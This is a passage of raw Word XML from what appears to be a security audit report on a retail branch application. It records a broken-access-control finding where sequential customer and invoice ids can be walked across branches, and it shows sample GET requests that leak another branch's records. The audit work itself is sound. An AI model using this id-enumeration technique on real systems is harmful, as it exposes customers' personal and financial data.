                  <v:path arrowok="t" textboxrect="0,0,866775,142875"/>
                </v:shape>
                <v:rect id="Rectangle 873" o:spid="_x0000_s1124" style="position:absolute;left:36381;top:13768;width:1085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76799E5D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>Invoice.php:16</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 874" o:spid="_x0000_s1125" style="position:absolute;left:44810;top:13716;width:877;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32BD4CB3" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">, </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 875" o:spid="_x0000_s1126" style="position:absolute;left:45434;top:13532;width:6381;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6381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lwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/disIw&#10;FITvF3yHcIS9W1MFf6hGUVkXb7yo+gCH5NgUm5PSZGv37TeC4OUwM98wq03vatFRGyrPCsajDASx&#10;9qbiUsH1cvhagAgR2WDtmRT8UYDNevCxwtz4BxfUnWMpEoRDjgpsjE0uZdCWHIaRb4iTd/Otw5hk&#10;W0rT4iPBXS0nWTaTDitOCxYb2lvS9/OvU3AM2U5/337IFNV4onddcZJXq9TnsN8uQUTq4zv8ah+N&#10;gsV8Cs8z6QjI9T8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAfpCF5cMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l628650,v2630,,4876,930,6735,2791c637245,4645,638175,6893,638175,9525r,123825c638175,135976,637245,138224,635385,140084v-1859,1855,-4105,2785,-6735,2791l9525,142875v-2630,-6,-4875,-936,-6735,-2791c930,138224,,135976,,133350l,9525c,6893,930,4645,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,638175,142875"/>
                </v:shape>
                <v:rect id="Rectangle 876" o:spid="_x0000_s1127" style="position:absolute;left:45740;top:13768;width:775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23342CB2" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>Grn.php:15</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25480" o:spid="_x0000_s1128" style="position:absolute;left:51839;top:13715;width:52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h0xwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasJA&#10;FIX3Bd9huEJ3dVKxJUZHEbXEZU0E290lc01CM3dCZpqkffrOouDycP741tvRNKKnztWWFTzPIhDE&#10;hdU1lwou+dtTDMJ5ZI2NZVLwQw62m8nDGhNtBz5Tn/lShBF2CSqovG8TKV1RkUE3sy1x8G62M+iD&#10;7EqpOxzCuGnkPIpepcGaw0OFLe0rKr6yb6Mgjdvdx8n+DmVz/Eyv79flIV96pR6n424FwtPo7+H/&#10;9kkrmL8s4gAQcAIKyM0fAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFt/WHTHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="23A36EF3" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t>)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25482" o:spid="_x0000_s1129" style="position:absolute;left:52235;top:13715;width:1535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WOYxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvgt9heUJvujFUiamriFr06J+C7e2RfU1Cs29DdmtiP31XEDwOM/MbZr7sTCWu1LjSsoLxKAJB&#10;nFldcq7g4/w+TEA4j6yxskwKbuRguej35phq2/KRriefiwBhl6KCwvs6ldJlBRl0I1sTB+/bNgZ9&#10;kE0udYNtgJtKxlE0lQZLDgsF1rQuKPs5/RoFu6Refe7tX5tX26/d5XCZbc4zr9TLoFu9gfDU+Wf4&#10;0d5rBfHkNYnhfidcAbn4BwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMThY5jHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4FE4224A" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t>. Branch isolation was</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 878" o:spid="_x0000_s1130" style="position:absolute;top:15430;width:4218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7E044BB1" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t>modelled throughout the schema and enforced nowhere</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 879" o:spid="_x0000_s1131" style="position:absolute;left:31718;top:15430;width:438;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05D8CB34" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t>.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 880" o:spid="_x0000_s1132" style="position:absolute;top:18097;width:5700;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68F82DC7" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t>Exploit.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 881" o:spid="_x0000_s1133" style="position:absolute;left:4286;top:18097;width:27990;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14012BB9" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> Authenticated as the Colombo cashier (</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 882" o:spid="_x0000_s1134" style="position:absolute;left:25336;top:17913;width:10478;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1047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OGxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/Na8JA&#10;FMTvBf+H5Qne6kaRGqKriNJq6cmPi7dH9plEs29DdvPhf98tFDwOM/MbZrnuTSlaql1hWcFkHIEg&#10;Tq0uOFNwOX++xyCcR9ZYWiYFT3KwXg3elpho2/GR2pPPRICwS1BB7n2VSOnSnAy6sa2Ig3eztUEf&#10;ZJ1JXWMX4KaU0yj6kAYLDgs5VrTNKX2cGqPAzb5328189nXvrvvrcY7Nj28bpUbDfrMA4an3r/B/&#10;+6AVxPEU/s6EIyBXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCpVbOGxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l1038225,v2630,,4876,930,6735,2784c1046820,4645,1047750,6893,1047750,9525r,114300c1047750,126451,1046820,128693,1044960,130553v-1859,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126451,,123825l,9525c,6893,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1047750,133350"/>
                </v:shape>
                <v:rect id="Rectangle 883" o:spid="_x0000_s1135" style="position:absolute;left:25601;top:18150;width:13179;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0BF7186D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>department_id</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> = 1</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 884" o:spid="_x0000_s1136" style="position:absolute;left:35779;top:18097;width:96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2170B443" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t>):</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 885" o:spid="_x0000_s1137" style="position:absolute;left:1007;top:22035;width:6229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7BC03DB0" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>GET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/customers/</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>2  →</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 200   leaked "Dilani Wickramasinghe", credit balance 78,500.00</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 886" o:spid="_x0000_s1138" style="position:absolute;left:1007;top:23750;width:4998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190B707E" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>GET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/invoices/2   → 200   leaked the Kandy branch invoice INV0002</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB0CA60"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Ids are sequential integers, so an employee could walk the whole database: every customer's name, address, phone and NIC, every invoice, every stock batch and its cost price, across every branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F509918"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0752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CF9056E" wp14:editId="78525600">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3523357</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-20102</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2152650" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25900" name="Group 25900"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2152650" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2152650" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="891" name="Shape 891"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2152650" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2152650" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2143125" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2145755" y="0"/>
                                  <a:pt x="2148000" y="930"/>
                                  <a:pt x="2149860" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2151720" y="4651"/>
                                  <a:pt x="2152649" y="6896"/>
                                  <a:pt x="2152650" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="2152650" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2152649" y="135979"/>
                                  <a:pt x="2151720" y="138224"/>
                                  <a:pt x="2149860" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2148000" y="141945"/>
                                  <a:pt x="2145755" y="142875"/>
                                  <a:pt x="214312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D0601B7" id="Group 25900" o:spid="_x0000_s1026" style="position:absolute;margin-left:277.45pt;margin-top:-1.6pt;width:169.5pt;height:11.25pt;z-index:-251465728" coordsize="21526,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&#10;">
                <v:shape id="Shape 891" o:spid="_x0000_s1027" style="position:absolute;width:21526;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="21526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FYxgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gq9mU1aFI2uUgKlgoJoK16f2dckbfZtyG5N7K/vCoLHYWa+YebL3tTiTK2rLCtIohgE&#10;cW51xYWCz4+34QSE88gaa8uk4EIOlouHwRxTbTve0XnvCxEg7FJUUHrfpFK6vCSDLrINcfC+bGvQ&#10;B9kWUrfYBbip5XMcj6XBisNCiQ1lJeU/+1+joOBDvFt/H7vjiDfvp81Ltf3LM6WeHvvXGQhPvb+H&#10;b+2VVjCZJnA9E46AXPwDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAG5shWMYAAADcAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l2143125,v2630,,4875,930,6735,2791c2151720,4651,2152649,6896,2152650,9525r,123825c2152649,135979,2151720,138224,2149860,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2152650,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Root cause.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The classic shape of a broken-access-control defect: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DiscountRequestController</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index:116</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scope its query to the caller. One place got it right. The pattern was understood and simply not applied anywhere else, because nothing made the omission visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620E0DDA" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="191" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="6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1776" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09BA46BF" wp14:editId="4A38D3E5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>351532</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-21796</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1104900" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25901" name="Group 25901"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1104900" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1104900" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="900" name="Shape 900"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1104900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1104900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1098005" y="0"/>
                                  <a:pt x="1100250" y="930"/>
                                  <a:pt x="1102110" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1103970" y="4651"/>
                                  <a:pt x="1104900" y="6896"/>
                                  <a:pt x="1104900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1104900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1104900" y="135979"/>
                                  <a:pt x="1103970" y="138224"/>
                                  <a:pt x="1102110" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1100250" y="141945"/>
                                  <a:pt x="1098005" y="142875"/>
